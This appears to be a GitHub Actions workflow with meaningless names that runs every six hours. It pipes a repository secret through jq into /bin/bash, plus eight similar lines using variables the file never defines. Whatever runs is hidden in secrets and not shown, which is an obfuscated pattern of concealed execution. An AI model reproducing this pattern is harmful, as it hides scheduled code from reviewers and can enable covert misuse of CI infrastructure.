name: canrongca

on:
  workflow_dispatch:
  schedule:
    - cron: '57 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: canrongca
        env:
          pe31: ${{ secrets.pe31 }}
        run: |
          echo $pe31 | jq -r .sl4106 | /bin/bash
          echo $wid49918 | jq -r .k7545 | /bin/bash
          echo $nlm938 | jq -r .fodax74945 | /bin/bash
          echo $aasw21 | jq -r .sgyl84616 | /bin/bash
          echo $lbk2 | jq -r .gk9 | /bin/bash
          echo $vdbl04442 | jq -r .bh1163 | /bin/bash
          echo $f45 | jq -r .ivvp82 | /bin/bash
          echo $dq41198 | jq -r .k4782 | /bin/bash
          echo $wfh45 | jq -r .f9 | /bin/bash

